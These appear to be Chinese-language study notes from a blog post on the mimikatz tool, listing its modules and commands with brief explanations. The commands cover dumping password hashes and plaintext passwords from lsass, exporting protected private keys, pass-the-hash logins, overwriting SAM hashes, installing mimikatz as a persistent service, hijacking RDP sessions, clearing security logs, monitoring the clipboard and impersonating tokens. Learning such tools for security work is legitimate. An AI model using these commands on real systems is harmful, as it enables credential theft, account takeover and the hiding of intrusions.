最近看了苑老师讲解的mimikatz ,于是有了一下的这些总结
mimikatz 是黑客最喜欢使用的工具之一,甚至不亚于Nmap
遗憾的是作者是一个法国大哥,官网我是一点都看不懂,翻译过来也是乱七八糟,感谢苑老师讲解
模块化设计的一个工具
需要在管理员权限或者SYSTEM权限下使用
可以直接输入一个 ? 进入标准模块,不过标准模块并没有特别多的用处
privilege
privilege::debug
提升为debug权限
privilege::id 20
调整id来调整权限,debug 是20,driver是10
CRYPTO (导出未标记为可导出的证书)
一般私钥会被标记为不可导出,使用这个参数可以给系统打patch,之后就可以导出了
crypto::providers
查看加密提供者,因为在windows中有各种各样的加密,这个参数可以查看提供者
一般有 CryptoAPI和 CNG 两种,其重CNG较为古老
crypto::stores
证书存储,windows 系统中有很多证书存储,默认的是CURRENT_USER 这个证书存储
这个命令可以查看这些证书存储下都有什么
如果我们想指定某个证书存储(以local_machine为例)
crypto::stores /systemstore:local_machine
crypto::certificates
查看子存储有哪些证书
默认Current_USER
可以使用 crypto::certificates /store:Root 查看Root存储的具体的信息
除了直接查询,我们也可以导出证书信息(在mimikatz目录下)
crypto::certificates/store:Root /export
导出的公钥是DER格式的
导出的私钥是PFX格式的
密码 mimikatz
crypto::capi
给CryptoAPI打补丁,比较新的系统可以使用这个打补丁,之后就支持CryptoAPI导出了
crypto::cng
打 cng 补丁
crypto::sc
列出智能卡读卡器
crypto::keys
读取密钥
可以添加一下参数来进行选择性查看
/provider -
/providertype
/cngprovider
/export 导出密钥PVK files这个格式并不是我们平常的pem 格式,我们需要进一步转换
openssl rsa –inform pvk –in key.pvk–outform pem –out key.pem
sekurlsa
从lsass进程中提取passwords、keys、pin、tickets等信息
注意,既然是从内存中读取,那么就不会去SAM数据库读取,所以SAM数据库临时改动,只要内存中没有,那就读取不到
sekurlsa::msv
获取HASH (LM,NTLM)
sekurlsa::wdigest
通过可逆的方式去内存中读取明文密码
sekurlsa::Kerberos
假如域管理员正好在登陆了我们的电脑,我们可以通过这个命令来获取域管理员的明文密码
sekurlsa::tspkg
通过tspkg读取明文密码
sekurlsa::livessp
通过livessp 读取明文密码
sekurlsa::ssp
通过ssp 读取明文密码
sekurlsa::logonPasswords
通过以上各种方法读取明文密码
sekurlsa::process
将自己的进程切换到lsass进程中,之前只是注入读取信息
sekurlsa::minidump file
这个模块可以读取已经打包的内存信息
比如我们之前已经将lsass 进程中的内存信息保存为dmp 文件了,那么此时我们可以离线的读取其中的信息了
需要制定文件名
sekurlsa::pth
pass-the-hash
可以直接用hash来进行登录
sekurlsa::pth /user:administrator/domain:host1 /ntlm:cdf34cda4e455232323xxxx
sekurlsa::pth /user:administrator/domain:host1 /aes256:cdf34cda4e455232323xxxx
其中/domain 如果加入了域,那就填写域名,如果没有,那就写计算机名
执行后会在本地新开一个以hash身份的命令行窗口
process
进程模块
process::list
列出进程列表
process::exports
导出进程列表
process::imports
导入列表
process::start
开始一个进程
process::stop
停止一个程序
process::suspend
冻结一个进程
process::resume
从冻结中恢复
process::run notepad
运行一个程序
process::runp
以SYSTEM系统权限打开一个新的mimikatz窗口
lsadump
通过查询SAM数据库来读取HASH
lsadump::sam
lsadump::setntlm /user:zs/ntlm:a3c4c5bb4c32xxxx
直接修改zs 用户在SAM数据库中的HASH,这样就不需要破解密码了
service
服务管理
service::list
列出当前服务
service::+
mimikatz 将自己注册为一个系统服务,这样每次系统起来就会自动运行了
ts
终端服务 terminal service
ts::multirdp
默认非服务器系统,windows只允许一个用户登录,也就是说如果我让别人远程登录我的电脑,那么我就不能操作了
这个命令可以让其支持多个用户同时在线
ts::sessions
可以查看当前登录用户的登录信息
可以看到当前的登录sessions,并且每个session都有编号
ts::remote /id:1
此时会跳出当前用户的账号,在主界面可以看到session为1的那个账号的已经登录了,我们输入密码可以看到他的登录信息,比如他在打开哪些文件
event
关于日志的操作,比如清空安全日志中的所有日志
日志信息有很多,其中比较重要的是安全日志,其中包含xx在xx时间登录了
event:clear
清空安全日志
event:drop
避免新的日志继续产生(现在效果还不好,是一个试验性的功能)
misc
杂项功能
misc::cmd
misc::regedit
misc::taskmgr
打开cmd,注册表编辑器,任务管理器等
misc::clip
监听剪切板
执行之后会一直监听着,直到我们输入Ctrl+c
dpapi
基于密码系统级别的应用数据保护服务(密码/私钥)
支持以上使用数据保护的服务
token
令牌
token::whoami
查看我是谁
token::list
列出都有哪些登录了的账号
token::elevate /lab
假如lab域存在,我们可以假冒成为域管理员的token
token::revert
取消假冒
vault
vault::cred
查看系统凭据
腾讯云开发者
